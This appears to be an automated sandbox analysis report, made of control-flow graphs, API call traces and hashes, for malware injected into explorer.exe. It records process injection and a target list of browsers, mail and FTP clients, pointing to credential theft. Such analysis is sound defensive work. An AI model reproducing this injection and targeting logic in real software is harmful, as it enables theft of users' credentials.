                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B11A020601D0A4BEB6DFBBD949D2793B95FB54302F54092BE41AC63A2EA298A808701

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000015.00000002.2428785683.00000000005D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 005D1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_5d1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 420147892-0
                                                                                                                                                                                                              • Opcode ID: ae82cc3535c3e538fde35235a4c5f0d33198cca8bd70fb29295229ff6f9da322
                                                                                                                                                                                                              • Instruction ID: 2c7005413fbcb231713b0f5a99a5b01176b4adac0298cf251ba04b6ac9fad29d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae82cc3535c3e538fde35235a4c5f0d33198cca8bd70fb29295229ff6f9da322
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B014430208E089FD755EB2CD8487AA7AE2FBD8315F00462EA15AC6255DB3899458745

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 10 5dd748-5dd74b 11 5dd755-5dd759 10->11 12 5dd75b-5dd763 11->12 13 5dd765 11->13 12->13 14 5dd74d-5dd753 13->14 15 5dd767 13->15 14->11 16 5dd76a-5dd771 15->16 18 5dd77d 16->18 19 5dd773-5dd77b 16->19 18->16 20 5dd77f-5dd782 18->20 19->18 21 5dd784-5dd792 20->21 22 5dd797-5dd7a4 20->22 23 5dd7ce-5dd7e9 21->23 24 5dd794-5dd795 21->24 32 5dd7be-5dd7cc call 5dd70a 22->32 33 5dd7a6-5dd7a8 22->33 25 5dd81a-5dd81d 23->25 24->22 27 5dd81f-5dd820 25->27 28 5dd822-5dd829 25->28 30 5dd801-5dd805 27->30 31 5dd82f-5dd833 28->31 34 5dd7eb-5dd7ee 30->34 35 5dd807-5dd80a 30->35 36 5dd835-5dd84e LoadLibraryA 31->36 37 5dd884-5dd88d 31->37 32->11 40 5dd7ab-5dd7b2 33->40 34->28 38 5dd7f0 34->38 35->28 41 5dd80c-5dd810 35->41 43 5dd84f-5dd856 36->43 39 5dd890-5dd899 37->39 44 5dd7f1-5dd7f5 38->44 45 5dd8be-5dd90e VirtualProtect * 2 39->45 46 5dd89b-5dd89d 39->46 57 5dd7bc 40->57 58 5dd7b4-5dd7ba 40->58 41->44 47 5dd812-5dd819 41->47 43->31 49 5dd858-5dd86e 43->49 44->30 50 5dd7f7-5dd7f9 44->50 54 5dd912-5dd917 45->54 51 5dd89f-5dd8ae 46->51 52 5dd8b0-5dd8bc 46->52 47->25 60 5dd879-5dd883 49->60 61 5dd870-5dd877 49->61 50->30 56 5dd7fb-5dd7ff 50->56 51->39 52->51 54->54 59 5dd919-5dd928 54->59 56->30 56->35 57->32 57->40 58->57 61->43
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,F6171042,?,2EC0275B), ref: 005DD847
                                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 005DD8E5
                                                                                                                                                                                                              • VirtualProtect.KERNELBASE ref: 005DD903
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000015.00000002.2428785683.00000000005DC000.00000040.80000000.00040000.00000000.sdmp, Offset: 005DC000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_5dc000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 895956442-0
                                                                                                                                                                                                              • Opcode ID: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                                                                                                                                                                                                              • Instruction ID: 4b7666e349638fd27b1af28a790b33737f70267d7e1a94f5f7d414d19ade1078
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86519B3265491D4BCB35AB3C9CC43F5BFE1F755322B580A7BC48AC3385EA58D88683A1

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 108 5d1b74-5d1b94 OpenFileMappingA 109 5d1bb7-5d1bc4 108->109 110 5d1b96-5d1bb4 MapViewOfFile 108->110 110->109
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000015.00000002.2428785683.00000000005D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 005D1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_5d1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$MappingOpenView
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3439327939-0
                                                                                                                                                                                                              • Opcode ID: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                                                                                                                                                                                                              • Instruction ID: c301099572caa2f56b849c81ef4b7fe4a933e3a2bdb4ab0fc557db0b962be0f4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DEF01235314F094FAB44EF7C9C8C535B7E1EBA8202B04867F995AC7165EF74C8818751

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 111 5d4914-5d496f call 5d1d08 * 3 SleepEx call 5d1838 120 5d4977-5d4979 111->120 121 5d497b-5d498e 120->121 122 5d49e0-5d49f4 120->122 127 5d4994-5d49de call 5d1838 call 5d1eb4 call 5d1860 121->127 125 5d4a18-5d4a2f 122->125 126 5d49f6-5d4a13 call 5d1eb4 122->126 126->125 127->122
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 005D1D08: CreateToolhelp32Snapshot.KERNEL32 ref: 005D1D1D
                                                                                                                                                                                                                • Part of subcall function 005D1D08: Process32First.KERNEL32 ref: 005D1D3C
                                                                                                                                                                                                                • Part of subcall function 005D1D08: CloseHandle.KERNELBASE ref: 005D1D74
                                                                                                                                                                                                                • Part of subcall function 005D1D08: Process32Next.KERNEL32 ref: 005D1D67
                                                                                                                                                                                                              • SleepEx.KERNELBASE ref: 005D4952
                                                                                                                                                                                                                • Part of subcall function 005D1EB4: FindFirstFileW.KERNELBASE ref: 005D1F05
                                                                                                                                                                                                                • Part of subcall function 005D1EB4: FindNextFileW.KERNELBASE ref: 005D1F7C
                                                                                                                                                                                                                • Part of subcall function 005D1EB4: FindClose.KERNELBASE ref: 005D1F89
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000015.00000002.2428785683.00000000005D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 005D1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_5d1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$CloseFileFirstNextProcess32$CreateHandleSleepSnapshotToolhelp32
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1868932505-0
                                                                                                                                                                                                              • Opcode ID: d94504f5ac59451a2c57a4813436b0da2714d47fc540bee79ff9f433ebcff8c2
                                                                                                                                                                                                              • Instruction ID: ae0cc761076bef50c8e1b011f59cdf7ee020dd6786aa9b2be3501a573c77dfd8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d94504f5ac59451a2c57a4813436b0da2714d47fc540bee79ff9f433ebcff8c2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7731A231208E095FDB69FB6CE8995AA77E2FB98301B50462FE44BC3261DE3499458B84

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:10.3%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:97.4%
                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                              Total number of Nodes:306
                                                                                                                                                                                                              Total number of Limit Nodes:42
                                                                                                                                                                                                              execution_graph 707 2797728 708 279774b 707->708 712 2797904 707->712 709 279785a LoadLibraryA 708->709 714 279789f VirtualProtect VirtualProtect 708->714 710 2797871 709->710 710->708 713 2797883 GetProcAddress 710->713 712->712 713->710 715 2797899 713->715 714->712 991 279245e lstrlen 992 27924a5 991->992 993 2792476 CryptBinaryToStringA 991->993 993->992 994 2792489 993->994 997 2792861 GetProcessHeap RtlAllocateHeap 994->997 996 2792494 CryptBinaryToStringA 996->992 997->996 716 2791000 717 2791010 716->717 718 2791007 716->718 720 2791016 718->720 769 2792608 VirtualQuery 720->769 723 2791097 723->717 725 279102c RtlMoveMemory 726 279104d 725->726 727 2791071 NtUnmapViewOfSection GetCurrentProcessId 725->727 806 2792861 GetProcessHeap RtlAllocateHeap 726->806 729 279109e 727->729 730 2791092 727->730 772 27910a4 729->772 730->723 733 2791095 730->733 732 2791052 RtlMoveMemory 732->727 807 2791332 733->807 734 27910a3 736 2792861 GetProcessHeap RtlAllocateHeap 734->736 737 27910cc 736->737 738 27910dc CreateToolhelp32Snapshot 737->738 739 27910f0 Process32First 738->739 740 2791322 Sleep 738->740 741 279131b CloseHandle 739->741 742 279110c lstrcmpiA 739->742 740->738 741->740 743 2791124 lstrcmpiA 742->743 756 2791280 742->756 744 2791138 lstrcmpiA 743->744 743->756 746 279114c lstrcmpiA 744->746 744->756 745 27925ad OpenProcess IsWow64Process IsWow64Process CloseHandle 745->756 747 2791160 lstrcmpiA 746->747 746->756 749 2791170 lstrcmpiA 747->749 747->756 748 2791305 Process32Next 748->742 750 2791319 748->750 751 2791184 lstrcmpiA 749->751 749->756 750->741 752 2791198 lstrcmpiA 751->752 751->756 753 27911ac lstrcmpiA 752->753 752->756 754 27911c0 lstrcmpiA 753->754 753->756 755 27911d4 lstrcmpiA 754->755 754->756 755->756 757 27911e8 lstrcmpiA 755->757 756->745 756->748 758 2792608 VirtualQuery 756->758 761 27912ae lstrcmpiA 756->761 765 2791819 30 API calls 756->765 757->756 759 27911fc lstrcmpiA 757->759 758->756 759->756 760 279120c lstrcmpiA 759->760 760->756 762 279121c lstrcmpiA 760->762 761->756 762->756 763 279122c lstrcmpiA 762->763 763->756 764 279123c lstrcmpiA 763->764 764->756 766 279124c lstrcmpiA 764->766 765->756 766->756 767 279125c lstrcmpiA 766->767 767->756 768 279126c lstrcmpiA 767->768 768->748 768->756 770 279101e 769->770 770->723 771 2792861 GetProcessHeap RtlAllocateHeap 770->771 771->725 834 2792861 GetProcessHeap RtlAllocateHeap 772->834 774 27910cc 775 27910dc CreateToolhelp32Snapshot 774->775 776 27910f0 Process32First 775->776 777 2791322 Sleep 775->777 778 279131b CloseHandle 776->778 779 279110c lstrcmpiA 776->779 777->775 778->777 780 2791280 779->780 781 2791124 lstrcmpiA 779->781 786 2791305 Process32Next 780->786 795 2792608 VirtualQuery 780->795 798 27912ae lstrcmpiA 780->798 835 27925ad OpenProcess 780->835 841 2791819 780->841 781->780 782 2791138 lstrcmpiA 781->782 782->780 784 279114c lstrcmpiA 782->784 784->780 785 2791160 lstrcmpiA 784->785 785->780 787 2791170 lstrcmpiA 785->787 786->779 788 2791319 786->788 787->780 789 2791184 lstrcmpiA 787->789 788->778 789->780 790 2791198 lstrcmpiA 789->790 790->780 791 27911ac lstrcmpiA 790->791 791->780 792 27911c0 lstrcmpiA 791->792 792->780 793 27911d4 lstrcmpiA 792->793 793->780 794 27911e8 lstrcmpiA 793->794 794->780 796 27911fc lstrcmpiA 794->796 795->780 796->780 797 279120c lstrcmpiA 796->797 797->780 799 279121c lstrcmpiA 797->799 798->780 799->780 800 279122c lstrcmpiA 799->800 800->780 801 279123c lstrcmpiA 800->801 801->780 803 279124c lstrcmpiA 801->803 803->780 804 279125c lstrcmpiA 803->804 804->780 805 279126c lstrcmpiA 804->805 805->780 805->786 806->732 887 2792861 GetProcessHeap RtlAllocateHeap 807->887 809 2791340 GetModuleFileNameA 888 2792861 GetProcessHeap RtlAllocateHeap 809->888 811 2791357 GetCurrentProcessId wsprintfA 889 279263e CryptAcquireContextA 811->889 814 279140d 912 2792843 814->912 815 279139c Sleep 894 27924d5 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 815->894 818 27913ae GetModuleHandleA GetProcAddress 820 27913c9 818->820 821 27913da GetModuleHandleA GetProcAddress 818->821 902 2791de3 820->902 824 27913f5 821->824 825 2791406 821->825 822 2792843 3 API calls 826 279141b RtlExitUserThread 822->826 827 2791de3 3 API calls 824->827 828 27924d5 10 API calls 825->828 829 2791425 826->829 827->825 828->814 830 279144b 829->830 831 2792608 VirtualQuery 829->831 830->729 832 279143a 831->832 832->830 917 2791493 832->917 834->774 836 27925cb IsWow64Process 835->836 837 2792600 835->837 838 27925dc IsWow64Process 836->838 839 27925ee 836->839 837->780 838->839 840 27925f9 CloseHandle 838->840 839->840 840->837 842 2792608 VirtualQuery 841->842 843 2791833 842->843 844 2791845 OpenProcess 843->844 846 2791a76 843->846 845 279185e 844->845 844->846 847 2792608 VirtualQuery 845->847 846->780 848 2791865 847->848 848->846 849 279188f 848->849 850 2791873 NtSetInformationProcess 848->850 872 2791a80 849->872 850->849 853 2791a80 2 API calls 854 27918d6 853->854 855 2791a73 CloseHandle 854->855 856 2791a80 2 API calls 854->856 855->846 857 2791900 856->857 878 2791b17 857->878 860 2791a80 2 API calls 861 2791930 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 860->861 862 2791a4e CreateRemoteThread 861->862 865 2791985 861->865 864 2791a65 CloseHandle 862->864 863 279198b CreateMutexA GetLastError 863->865 866 27919a7 CloseHandle Sleep 863->866 867 2791a67 CloseHandle CloseHandle 864->867 865->863 868 27919bb GetModuleHandleA GetProcAddress ReadProcessMemory 865->868 866->863 867->855 869 27919ec WriteProcessMemory 868->869 870 2791a47 868->870 869->870 871 2791a16 CreateRemoteThread CloseHandle Sleep WriteProcessMemory 869->871 870->864 870->867 871->870 873 2791a94 872->873 875 27918b4 872->875 874 2791aa4 NtCreateSection 873->874 876 2791ac3 873->876 874->876 875->853 876->875 877 2791ad8 NtMapViewOfSection 876->877 877->875 879 2791b2e 878->879 880 2791b60 878->880 881 2791b30 RtlMoveMemory 879->881 882 2791b71 LoadLibraryA 880->882 885 2791bc3 880->885 886 2791ba1 GetProcAddress 880->886 881->880 881->881 882->880 884 2791910 NtUnmapViewOfSection 882->884 883 2791be1 LdrProcessRelocationBlock 883->884 883->885 884->860 885->883 885->884 886->880 886->884 887->809 888->811 890 2791384 CreateMutexA GetLastError 889->890 891 2792664 CryptCreateHash lstrlen CryptHashData CryptGetHashParam 889->891 890->814 890->815 892 27926aa wsprintfA 891->892 892->892 893 27926cc CryptDestroyHash CryptReleaseContext 892->893 893->890 895 2792515 894->895 896 2792565 CloseHandle 895->896 897 2792555 Thread32Next 895->897 898 2792521 OpenThread 895->898 896->818 897->895 899 279253c SuspendThread 898->899 900 2792544 ResumeThread 898->900 901 279254a CloseHandle 899->901 900->901 901->897 903 2791e56 902->903 904 2791ded 902->904 903->821 904->903 944 2791e93 VirtualProtect 904->944 906 2791e04 906->903 945 2792815 VirtualAlloc 906->945 908 2791e10 909 2791e2d 908->909 910 2791e1a RtlMoveMemory 908->910 946 2791e93 VirtualProtect 909->946 910->909 913 2792608 VirtualQuery 912->913 914 279284b 913->914 915 2791414 914->915 916 279284f GetProcessHeap HeapFree 914->916 915->822 916->915 918 27914a1 917->918 919 27914c0 917->919 947 27917c7 918->947 921 27914c8 919->921 922 2791510 919->922 925 27917c7 5 API calls 921->925 940 27914b6 921->940 966 27926e6 lstrlen lstrlen 922->966 928 27914e0 925->928 926 279155f 927 27926e6 2 API calls 926->927 930 279156c 927->930 928->940 954 2791647 928->954 933 27915a0 930->933 934 2791584 930->934 930->940 931 2791532 968 2791752 GetModuleHandleA GetProcAddress 931->968 938 2792404 5 API calls 933->938 933->940 971 2792404 lstrlen 934->971 941 27915ac 938->941 939 2791647 11 API calls 939->940 940->830 941->940 942 2791647 11 API calls 941->942 943 27914fb 942->943 943->940 977 27915e0 943->977 944->906 945->908 946->903 948 27917d1 947->948 949 2791812 947->949 948->949 950 27926e6 2 API calls 948->950 949->940 951 27917f1 950->951 951->949 982 2792861 GetProcessHeap RtlAllocateHeap 951->982 953 2791804 RtlMoveMemory 953->949 955 2791660 954->955 958 2791745 954->958 956 2791671 lstrlen 955->956 955->958 957 2791683 lstrlen 956->957 956->958 957->958 959 2791690 getpeername 957->959 958->943 959->958 960 27916ae inet_ntoa htons 959->960 960->958 962 27916cc 960->962 962->958 983 2792861 GetProcessHeap RtlAllocateHeap 962->983 963 2791717 wsprintfA 964 279173a 963->964 964->958 965 2792843 3 API calls 964->965 965->958 967 279151d 966->967 967->926 967->931 969 2791539 968->969 970 2791776 RtlZeroMemory RtlZeroMemory RtlZeroMemory RtlZeroMemory 968->970 969->939 969->940 970->969 972 279241c CryptStringToBinaryA 971->972 973 2792456 971->973 972->973 974 2792438 972->974 973->940 984 2792861 GetProcessHeap RtlAllocateHeap 974->984 976 2792444 CryptStringToBinaryA 976->973 978 2792843 3 API calls 977->978 979 27915f5 978->979 980 2792843 3 API calls 979->980 981 27915fc 980->981 981->940 982->953 983->963 984->976 998 2791425 999 279144b 998->999 1000 2791432 998->1000 1001 2792608 VirtualQuery 1000->1001 1002 279143a 1001->1002 1002->999 1003 2791493 23 API calls 1002->1003 1003->999 1004 2791eb6 1005 2791ed9 1004->1005 1006 2791ecc lstrlen 1004->1006 1015 2792861 GetProcessHeap RtlAllocateHeap 1005->1015 1006->1005 1008 2791ee1 lstrcat 1009 2791f1d 1008->1009 1010 2791f16 lstrcat 1008->1010 1016 2791f4a 1009->1016 1010->1009 1013 2792843 3 API calls 1014 2791f40 1013->1014 1015->1008 1050 27922b8 1016->1050 1020 2791f77 1055 27927e2 lstrlen MultiByteToWideChar 1020->1055 1022 2791f86 1056 2792374 RtlZeroMemory 1022->1056 1025 2791fd8 RtlZeroMemory 1027 279200d 1025->1027 1026 2792843 3 API calls 1028 2791f2d 1026->1028 1031 279229a 1027->1031 1033 279203b 1027->1033 1058 27922e5 1027->1058 1028->1013 1030 2792280 1030->1031 1032 2792843 3 API calls 1030->1032 1031->1026 1032->1031 1033->1030 1067 2792861 GetProcessHeap RtlAllocateHeap 1033->1067 1035 279210b wsprintfW 1036 2792131 1035->1036 1040 279219e 1036->1040 1068 2792861 GetProcessHeap RtlAllocateHeap 1036->1068 1038 279216b wsprintfW 1038->1040 1039 279225d 1041 2792843 3 API calls 1039->1041 1040->1039 1069 2792861 GetProcessHeap RtlAllocateHeap 1040->1069 1043 2792271 1041->1043 1043->1030 1044 2792843 3 API calls 1043->1044 1044->1030 1045 27921e9 1046 2792256 1045->1046 1070 2792815 VirtualAlloc 1045->1070 1048 2792843 3 API calls 1046->1048 1048->1039 1049 2792243 RtlMoveMemory 1049->1046 1051 2791f69 1050->1051 1052 27922c2 1050->1052 1054 2792861 GetProcessHeap RtlAllocateHeap 1051->1054 1053 27926e6 2 API calls 1052->1053 1053->1051 1054->1020 1055->1022 1057 2791f96 1056->1057 1057->1025 1057->1031 1060 27922f2 1058->1060 1061 2792353 1058->1061 1059 27922f6 DnsQuery_W 1059->1060 1060->1059 1060->1061 1062 2792335 DnsFree inet_ntoa 1060->1062 1061->1033 1062->1060 1063 2792355 1062->1063 1071 2792861 GetProcessHeap RtlAllocateHeap 1063->1071 1065 279235f 1072 27927e2 lstrlen MultiByteToWideChar 1065->1072 1067->1035 1068->1038 1069->1045 1070->1049 1071->1065 1072->1061 1073 2792806 VirtualFree

                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              • Opacity -> Relevance
                                                                                                                                                                                                              • Disassembly available
                                                                                                                                                                                                              callgraph 0 Function_027922B8 18 Function_027926E6 0->18 1 Function_0279263E 2 Function_02792731 3 Function_02792573 4 Function_02791332 4->1 11 Function_02792861 4->11 13 Function_02791DE3 4->13 23 Function_02791493 4->23 27 Function_027924D5 4->27 32 Function_02792608 4->32 39 Function_02792843 4->39 5 Function_02792374 6 Function_02791EB6 6->11 33 Function_02791F4A 6->33 6->39 7 Function_02791469 7->23 7->32 8 Function_02797728 9 Function_027925AD 10 Function_027924AE 12 Function_027915E0 12->39 21 Function_02791E5D 13->21 24 Function_02791E93 13->24 28 Function_02792815 13->28 36 Function_02791DC0 13->36 14 Function_027927E2 15 Function_02791425 15->23 15->32 16 Function_027922E5 16->11 16->14 17 Function_027910A4 17->2 17->3 17->9 17->11 19 Function_02791819 17->19 25 Function_02792592 17->25 17->32 29 Function_02791B17 19->29 19->32 35 Function_02791A80 19->35 20 Function_02791C19 37 Function_02791D80 21->37 22 Function_0279245E 22->11 23->12 23->18 26 Function_02791752 23->26 40 Function_02792404 23->40 41 Function_02791647 23->41 42 Function_027917C7 23->42 30 Function_02793417 31 Function_02791016 31->2 31->3 31->4 31->9 31->11 31->17 31->19 31->25 31->32 33->0 33->2 33->5 33->11 33->14 33->16 33->28 33->39 34 Function_02792841 36->20 37->20 38 Function_02791000 38->31 39->32 40->11 41->10 41->11 41->39 42->11 42->18 43 Function_02792806

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 0 2791016-2791020 call 2792608 3 2791022-279104b call 2792861 RtlMoveMemory 0->3 4 2791097-2791098 0->4 7 279104d-279106b call 2792861 RtlMoveMemory 3->7 8 2791071-2791090 NtUnmapViewOfSection GetCurrentProcessId 3->8 7->8 10 279109e-27910d7 call 27910a4 call 2792861 8->10 11 2791092-2791093 8->11 21 27910dc-27910ea CreateToolhelp32Snapshot 10->21 11->4 14 2791095-2791099 call 2791332 11->14 14->10 22 27910f0-2791106 Process32First 21->22 23 2791322-279132d Sleep 21->23 24 279131b-279131c CloseHandle 22->24 25 279110c-279111e lstrcmpiA 22->25 23->21 24->23 26 2791280-2791289 call 27925ad 25->26 27 2791124-2791132 lstrcmpiA 25->27 33 279128b-2791294 call 2792592 26->33 34 2791305-2791313 Process32Next 26->34 27->26 28 2791138-2791146 lstrcmpiA 27->28 28->26 30 279114c-279115a lstrcmpiA 28->30 30->26 32 2791160-279116a lstrcmpiA 30->32 32->26 35 2791170-279117e lstrcmpiA 32->35 33->34 40 2791296-279129d call 2792573 33->40 34->25 36 2791319 34->36 35->26 39 2791184-2791192 lstrcmpiA 35->39 36->24 39->26 41 2791198-27911a6 lstrcmpiA 39->41 40->34 47 279129f-27912ac call 2792608 40->47 41->26 43 27911ac-27911ba lstrcmpiA 41->43 43->26 44 27911c0-27911ce lstrcmpiA 43->44 44->26 46 27911d4-27911e2 lstrcmpiA 44->46 46->26 48 27911e8-27911f6 lstrcmpiA 46->48 47->34 53 27912ae-2791300 lstrcmpiA call 2792731 call 2791819 call 2792731 47->53 48->26 50 27911fc-279120a lstrcmpiA 48->50 50->26 52 279120c-279121a lstrcmpiA 50->52 52->26 54 279121c-279122a lstrcmpiA 52->54 53->34 54->26 56 279122c-279123a lstrcmpiA 54->56 56->26 58 279123c-279124a lstrcmpiA 56->58 58->26 60 279124c-279125a lstrcmpiA 58->60 60->26 62 279125c-279126a lstrcmpiA 60->62 62->26 64 279126c-279127a lstrcmpiA 62->64 64->26 64->34
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02792608: VirtualQuery.KERNEL32(02794434,?,0000001C), ref: 02792615
                                                                                                                                                                                                                • Part of subcall function 02792861: GetProcessHeap.KERNEL32(00000008,0000A000,027910CC), ref: 02792864
                                                                                                                                                                                                                • Part of subcall function 02792861: RtlAllocateHeap.NTDLL(00000000), ref: 0279286B
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02791038
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0279106B
                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 02791074
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,02791010), ref: 0279107A
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 027910DF
                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 027910FE
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0279111A
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0279112E
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 02791142
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,opera.exe), ref: 02791156
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02791166
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0279117A
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0279118E
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 027911A2
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 027911B6
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 027911CA
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 027911DE
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 027911F2
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 02791206
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 02791216
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 02791226
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 02791236
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,263em.exe), ref: 02791246
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 02791256
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 02791266
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 02791276
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 027912B4
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 0279130B
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 0279131C
                                                                                                                                                                                                              • Sleep.KERNELBASE(000003E8), ref: 02791327
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
                                                                                                                                                                                                              • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                                                                                                                                                              • API String ID: 2555639992-1680033604
                                                                                                                                                                                                              • Opcode ID: 0013bc2c8f0dcb72ffda1c990a55c4eeaf7970e0857b1165052c83113db4dbdc
                                                                                                                                                                                                              • Instruction ID: 0c5f84bcc0dd0eacdf458b5c14d49c8bfdec3666fb5c3f3d2dee69ca44f8b6ef
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0013bc2c8f0dcb72ffda1c990a55c4eeaf7970e0857b1165052c83113db4dbdc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1971E470A80306ABEF10EBB1BC58E6F3BBCAF45784B844969F945D3140EB31D5168F64

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02792861: GetProcessHeap.KERNEL32(00000008,0000A000,027910CC), ref: 02792864
                                                                                                                                                                                                                • Part of subcall function 02792861: RtlAllocateHeap.NTDLL(00000000), ref: 0279286B
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 027910DF
                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 027910FE
